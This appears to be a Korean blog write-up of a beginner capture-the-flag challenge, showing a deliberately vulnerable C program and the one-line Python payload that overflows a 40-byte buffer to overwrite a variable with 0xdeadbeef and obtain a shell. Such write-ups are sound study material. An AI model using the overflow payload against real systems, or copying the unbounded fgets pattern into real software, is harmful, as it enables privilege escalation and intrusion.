카테고리 없음

Pwn 1일차 (ELF x86 - Stack buffer overflow basic 1)

controlpro 2020. 11. 23. 22:14
728x90
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
 
int main()
{
 
  int var;
  int check = 0x04030201;
  char buf[40];
 
  fgets(buf,45,stdin);
 
  printf("\n[buf]: %s\n", buf);
  printf("[check] %p\n", check);
 
  if ((check != 0x04030201) && (check != 0xdeadbeef))
    printf ("\nYou are on the right way!\n");
 
  if (check == 0xdeadbeef)
   {
     printf("Yeah dude! You win!\nOpening your shell...\n");
     setreuid(geteuid(), geteuid());
     system("/bin/bash");
     printf("Shell closed! Bye.\n");
   }
   return 0;
}

 

 

 

소스코드를 보면 사실 별거 없다.

check인수를 0x4030201에서 0xdeadbeef로 바꾸면 된다.

gdb로 확인해보면 우리가 입력할 수 있는  buf변수가 check 변수랑 붙어있어서 buf 변수의 입력을 받을 때 bof를 써서 check를 덮으면 된다. 

check 변수와 buf변수는 40만큼 차이가 나므로 40개의 null값을 넣어주고 deadbeef를 넣어주면된다 . 

 

(python -c "print 'a' * 40 + '\xef\xbe\xad\xde'";cat) | ./ch13

 

 

 

 

 

728x90
반응형